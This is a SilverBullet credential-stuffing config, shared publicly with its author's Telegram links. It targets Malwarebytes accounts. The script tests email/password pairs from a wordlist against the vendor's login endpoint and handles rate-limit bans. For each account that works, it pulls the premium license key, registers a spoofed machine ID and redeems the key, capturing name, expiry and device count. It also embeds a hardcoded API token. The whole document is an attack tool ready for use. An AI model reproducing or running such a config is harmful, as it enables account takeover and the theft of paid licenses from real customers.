malwarebytes

Public

.SVB

YASHVIRGAMING Dec 30, 2025 9 .SVB

Save New

[SETTINGS]
{
  "Name": "malwarebytes",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2025-09-22T00:45:44.9966473+04:00",
  "AdditionalInfo": "https://t.me/OFFICIALYASHVIRGAMING_GROUPCHAT",
  "RequiredPlugins": [],
  "Author": "🔥 @therealyashvirgaming 🔥",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "Join TG: https://t.me/OFFICIALYASHVIRGAMING_GROUPCHAT",
      "VariableName": "",
      "Id": 292641858
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "malwarebytes",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://my-sso.malwarebytes.com/auth" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"generate_holocron_token\":true}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: my-sso.malwarebytes.com" 
  HEADER "User-Agent: MBAM/4.3.0.98 (build: 1.0.1251; Windows 10.0.14393)" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Language: en-US,*" 
  HEADER "Accept-Encoding: gzip, deflate"

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "holocron_user_token" 
  KEYCHAIN Failure OR 
    KEY "success\":false," 
  KEYCHAIN Ban OR 
    KEY "<RESPONSECODE>" Contains "429"

PARSE "<SOURCE>" JSON "full_name" CreateEmpty=FALSE -> CAP "Name"

PARSE "<SOURCE>" LR "[{\"name\":\"Account:" "\"" CreateEmpty=FALSE -> CAP "Account Type"

PARSE "<SOURCE>" JSON "holocron_user_token" -> VAR "token"

REQUEST POST "https://holocron.mwbsys.com/graphql" 
  CONTENT "{                 \"query\":                  \"query($where: ViewerWhereInput) {                   viewer{                    keystoneKeys(where: $where) {                     licenseKey                     default                    }                   }                  }\",                 \"variables\": {                  \"where\": {                   \"product\": \"premium\"                  }                 }                }" 
  CONTENTTYPE "application/json" 
  HEADER "Host: holocron.mwbsys.com" 
  HEADER "Authorization: Bearer <token>" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Language: en-US,*" 
  HEADER "User-Agent: Mozilla/5.0" 
  HEADER "Accept-Encoding: gzip, deflate"

PARSE "<SOURCE>" JSON "licenseKey" CreateEmpty=FALSE -> CAP "License Key"

IF "<License Key>" DoesNotExist
JUMP #here
ENDIF

FUNCTION RandomString "?d?l?l?l?l?l?l?d?d?d?l?d?d?d?l?l?d?l?d?d?l?d?d?d?l?d?l?l?d?l?l?d?l?l?d?l?l?d?d?d" -> VAR "id"

REQUEST POST "https://keystone.mwbsys.com//api/v1/installations/register.json" 
  CONTENT "{   \"machine_id\" : \"<id>\",   \"product_build\" : \"consumer\",   \"product_code\" : \"MBAM-C\",   \"product_version\" : \"3.7.1\",   \"tags\" : \"{\\\\u000a   \\\"affiliate_id\\\" : \\\"\\\",\\\\u000a   \\\"affiliate_name\\\" : \\\"consumer\\\",\\\\u000a   \\\"antivirus\\\" : [\\\\u000a      \\\"Windows Defender\\\"\\\\u000a   ],\\\\u000a   \\\"biz_env\\\" : false,\\\\u000a   \\\"domain_name\\\" : \\\"\\\",\\\\u000a   \\\"is_on_domain\\\" : false,\\\\u000a   \\\"license_state\\\" : \\\"unknown\\\",\\\\u000a   \\\"os\\\" : \\\"Windows 10 (Build 18362.778)\\\",\\\\u000a   \\\"os_build\\\" : \\\"18363\\\",\\\\u000a   \\\"unredeem_reason\\\" : \\\"\\\",\\\\u000a   \\\"user_is_admin\\\" : false\\\\u000a}\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: MBAM-C/4.3.0.98/consumer" 
  HEADER "Authorization: Token token=\"PibtEHLM7kuWpRZ678pd\"" 
  HEADER "Host: keystone.mwbsys.com"

PARSE "<SOURCE>" JSON "installation_token" -> VAR "itoken"

REQUEST POST "https://keystone.mwbsys.com//api/v1/installations/redeem.json" 
  CONTENT "{\\n   \"installation_token\" : \"<itoken>\",\\n   \"license_key\" : \"<License Key>\",\\n   \"tags\" : \"{\\\\u000a   \\\"affiliate_id\\\" : \\\"\\\",\\\\u000a   \\\"affiliate_name\\\" : \\\"\\\",\\\\u000a   \\\"antivirus\\\" : [\\\\u000a\\\\u000a   ],\\\\u000a   \\\"biz_env\\\" : false,\\\\u000a   \\\"domain_devices\\\" : 0,\\\\u000a   \\\"domain_name\\\" : \\\"\\\",\\\\u000a   \\\"is_on_domain\\\" : false,\\\\u000a   \\\"license_state\\\" : \\\"free\\\",\\\\u000a   \\\"os\\\" : \\\"Windows 10 Server (Build 14393.4283)\\\",\\\\u000a   \\\"os_build\\\" : \\\"14393\\\",\\\\u000a   \\\"unredeem_reason\\\" : \\\"\\\",\\\\u000a   \\\"user_is_admin\\\" : false\\\\u000a}\"\\n}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: MBAM-C/4.3.0.98/consumer" 
  HEADER "Content-Type: application/json" 
  HEADER "Enable-Catalog-Enforcement: true" 
  HEADER "Authorization: Token token=\"PibtEHLM7kuWpRZ678pd\"" 
  HEADER "Connection: Close" 
  HEADER "Host: keystone.mwbsys.com"

PARSE "<SOURCE>" JSON "name" -> CAP "Product Name"

FUNCTION Replace "term_ends_on\":null,\"" "term_ends_on\":\"No(Lifetime)T,\"" "<SOURCE>" -> VAR "Expire"

PARSE "<Expire>" LR "term_ends_on\":\"" "T" -> CAP "Expiry Date"

PARSE "<SOURCE>" JSON "volume_used" CreateEmpty=FALSE -> VAR "Used"

FUNCTION Compute "<Used>-1" -> CAP "Devices"

PARSE "<SOURCE>" JSON "enabled" -> CAP "Enabled"

#AUTHOR FUNCTION Constant "🔥 @therealyashvirgaming 🔥" -> CAP "Config By "

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "status\":\"ok\",\"" 
  KEYCHAIN Custom "Blacklisted" OR 
    KEY "blacklisted" 
  KEYCHAIN Custom "Limit Reached" OR 
    KEY "status\":\"volume_maxed" 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "entitlement_expired" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<License Key>" DoesNotExist

malwarebytes

Scan to View